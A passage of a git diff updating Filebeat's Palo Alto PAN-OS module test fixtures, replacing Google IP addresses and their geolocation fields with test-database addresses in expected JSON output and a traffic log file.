-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8670,16 +8327,19 @@
         "client.ip": "192.168.0.2",
         "client.port": 49681,
         "client.user.name": "picard",
-        "destination.address": "74.125.224.201",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "destination.address": "89.160.20.156",
+        "destination.as.number": 29518,
+        "destination.as.organization.name": "Bredband2 AB",
+        "destination.geo.city_name": "Link\u00f6ping",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "SE",
+        "destination.geo.country_name": "Sweden",
+        "destination.geo.location.lat": 58.4167,
+        "destination.geo.location.lon": 15.6167,
         "destination.geo.name": "United States",
-        "destination.ip": "74.125.224.201",
+        "destination.geo.region_iso_code": "SE-E",
+        "destination.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "destination.ip": "89.160.20.156",
         "destination.port": 80,
         "event.action": "data_match",
         "event.category": [
@@ -8690,7 +8350,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,74.125.224.201,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,89.160.20.156,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,\"__utm.gif\",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8703,9 +8363,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 36112,
+        "log.offset": 35972,
         "network.application": "google-analytics",
-        "network.community_id": "1:5z6QdMj01RaYM1NdZtQSRQgE9gk=",
+        "network.community_id": "1:8xEo6/LvOntD+xMHdXzKIXv9JxE=",
         "network.direction": "inbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8737,13 +8397,13 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.201"
+            "89.160.20.156"
         ],
         "related.user": [
             "picard"
         ],
         "rule.name": "rule1",
-        "server.ip": "74.125.224.201",
+        "server.ip": "89.160.20.156",
         "server.port": 80,
         "service.type": "panw",
         "source.address": "192.168.0.2",
@@ -8759,7 +8419,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:54:35.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8775,7 +8435,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8787,9 +8447,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 36494,
+        "log.offset": 36353,
         "network.application": "google-maps",
-        "network.community_id": "1:Ut9W+vlgpMAH7M4p87nZ/gF7zO8=",
+        "network.community_id": "1:diAtdns9tWiH2bS++Pup9kMV+AI=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8821,7 +8481,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "picard"
@@ -8831,16 +8491,17 @@
         "server.port": 50108,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8849,7 +8510,7 @@
     },
     {
         "@timestamp": "2012-04-09T06:54:55.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -8865,7 +8526,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -8877,9 +8538,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 36869,
+        "log.offset": 36725,
         "network.application": "google-maps",
-        "network.community_id": "1:MNjszUBgbVupAxKdr7W7OIvU2lo=",
+        "network.community_id": "1:cs7mutkQqIorGFAbWD2/09AnYXk=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -8911,7 +8572,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "picard"
@@ -8921,16 +8582,17 @@
         "server.port": 50387,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -8943,13 +8605,6 @@
         "client.port": 59781,
         "client.user.name": "jordy",
         "destination.address": "208.85.40.48",
-        "destination.as.number": 40428,
-        "destination.as.organization.name": "Pandora Media, Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "208.85.40.48",
         "destination.port": 80,
@@ -8975,7 +8630,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 37244,
+        "log.offset": 37097,
         "network.application": "pandora",
         "network.community_id": "1:PzMJQoALQDxnDaqwOEEz4zxyhHU=",
         "network.direction": "inbound",
@@ -9031,7 +8686,7 @@
     },
     {
         "@timestamp": "2012-04-09T03:45:45.000-02:00",
-        "client.ip": "74.125.224.201",
+        "client.ip": "89.160.20.156",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -9047,7 +8702,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -9059,9 +8714,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 37631,
+        "log.offset": 37484,
         "network.application": "google-maps",
-        "network.community_id": "1:ThkQfWduH5PZoI7qa/R4rWqT2VM=",
+        "network.community_id": "1:8xnlPG6iTh0CwnSMVwmWkniCAeM=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -9093,7 +8748,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.201"
+            "89.160.20.156"
         ],
         "related.user": [
             "jordy"
@@ -9103,16 +8758,19 @@
         "server.port": 60005,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.201",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.201",
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -9121,7 +8779,7 @@
     },
     {
         "@timestamp": "2012-04-09T03:49:17.000-02:00",
-        "client.ip": "74.125.224.201",
+        "client.ip": "89.160.20.156",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -9137,7 +8795,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,74.125.224.201,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,89.160.20.156,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -9149,9 +8807,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 38005,
+        "log.offset": 37857,
         "network.application": "google-maps",
-        "network.community_id": "1:Fd/TWc6RIS9q2bsgzztXrAAL4Ek=",
+        "network.community_id": "1:SQGgi8ETBszNJv+EzlSRiGB/m5A=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -9183,7 +8841,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.201"
+            "89.160.20.156"
         ],
         "related.user": [
             "jordy"
@@ -9193,16 +8851,19 @@
         "server.port": 60443,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.201",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.201",
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -9211,7 +8872,7 @@
     },
     {
         "@timestamp": "2012-04-09T03:53:41.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -9227,7 +8888,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -9239,9 +8900,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 38377,
+        "log.offset": 38228,
         "network.application": "google-maps",
-        "network.community_id": "1:7gqxhjxtnxyQnsvGukcI+WZWzAY=",
+        "network.community_id": "1:21uyYLV+/XbEeb+gCdBr5K1MWLU=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -9273,7 +8934,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "jordy"
@@ -9283,16 +8944,17 @@
         "server.port": 60822,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -9301,7 +8963,7 @@
     },
     {
         "@timestamp": "2012-04-09T03:55:23.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -9317,7 +8979,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:23,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:28,1475,1,80,61105,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -9329,9 +8991,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 38749,
+        "log.offset": 38597,
         "network.application": "google-maps",
-        "network.community_id": "1:ZzHOd7AFzjbGqVCj9S3bTNHFX4Q=",
+        "network.community_id": "1:QEEd+0of3hSmO6x9aRpIaHXdaUI=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -9363,7 +9025,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "jordy"
@@ -9373,16 +9035,17 @@
         "server.port": 61105,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -9391,7 +9054,7 @@
     },
     {
         "@timestamp": "2012-04-09T03:55:52.000-02:00",
-        "client.ip": "74.125.224.198",
+        "client.ip": "81.2.69.193",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -9407,7 +9070,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:55:52,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-analytics,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:55:57,883,1,80,60782,0,0,0x200000,tcp,alert,\"ga.js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -9420,9 +9083,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 39122,
+        "log.offset": 38967,
         "network.application": "google-analytics",
-        "network.community_id": "1:uH37XIov0Sgv5kARW8dP9vrOs7w=",
+        "network.community_id": "1:BnyjuRL2HOxT/uRoNE3ra3neRSY=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -9454,7 +9117,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.198"
+            "81.2.69.193"
         ],
         "related.user": [
             "jordy"
@@ -9464,16 +9127,17 @@
         "server.port": 60782,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.198",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.198",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -9482,7 +9146,7 @@
     },
     {
         "@timestamp": "2012-04-09T04:03:55.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -9498,7 +9162,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 04:03:55,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:04:00,1965,1,80,61470,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -9510,9 +9174,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 39497,
+        "log.offset": 39339,
         "network.application": "google-maps",
-        "network.community_id": "1:9jnjFXERN6VFakI1U/qwzyqifzg=",
+        "network.community_id": "1:eGnclJrBulAHa+EiT+kLvValbJE=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -9544,7 +9208,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "jordy"
@@ -9554,16 +9218,17 @@
         "server.port": 61470,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log
index 70d2804a7127..32d2e1ba1c46 100644
--- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log
+++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log
@@ -1,100 +1,100 @@
-Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
+Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
 Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0
